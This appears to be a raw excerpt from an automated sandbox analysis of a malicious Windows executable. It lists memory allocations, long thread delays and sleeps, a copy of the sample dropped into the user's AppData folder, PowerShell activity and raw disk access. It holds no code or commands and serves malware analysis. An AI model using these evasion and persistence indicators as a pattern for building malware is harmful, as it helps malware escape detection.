Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: 9B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: 9D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: AD70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: B2F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: C2F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: D2F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: 2440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: 25D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: 45D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: 2940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: 26A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: 8140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: 9140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: 9320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: A320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: A960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: B960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: 2B60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598279	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 594452	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598246
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598031
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597921
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597266
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596594
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596374
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596155
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596046
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595828
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595609
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595498
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595389
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595281
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 594625

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8910	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 621	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9124	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 373	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Window / User API: threadDelayed 1551	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Window / User API: threadDelayed 8303	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Window / User API: threadDelayed 1471
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Window / User API: threadDelayed 8393

Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 6204	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1428	Thread sleep count: 8910 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1476	Thread sleep count: 621 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6572	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2836	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7380	Thread sleep count: 1551 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7380	Thread sleep count: 8303 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -598390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -598279s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -594563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376	Thread sleep time: -594452s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 768	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7408	Thread sleep count: 1471 > 30
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7408	Thread sleep count: 8393 > 30
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -598797s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -598578s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -598469s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -598246s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -598140s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -598031s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -597921s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -597812s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -597702s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -597593s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -597375s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -597266s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -597141s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -597031s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -596594s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -596484s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -596374s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -596265s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -596155s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -596046s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -595937s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -595828s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -595719s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -595609s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -595498s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -595389s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -595281s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -595172s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -595062s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -594844s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404	Thread sleep time: -594625s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7664	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598279	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 598062	Jump to behavior
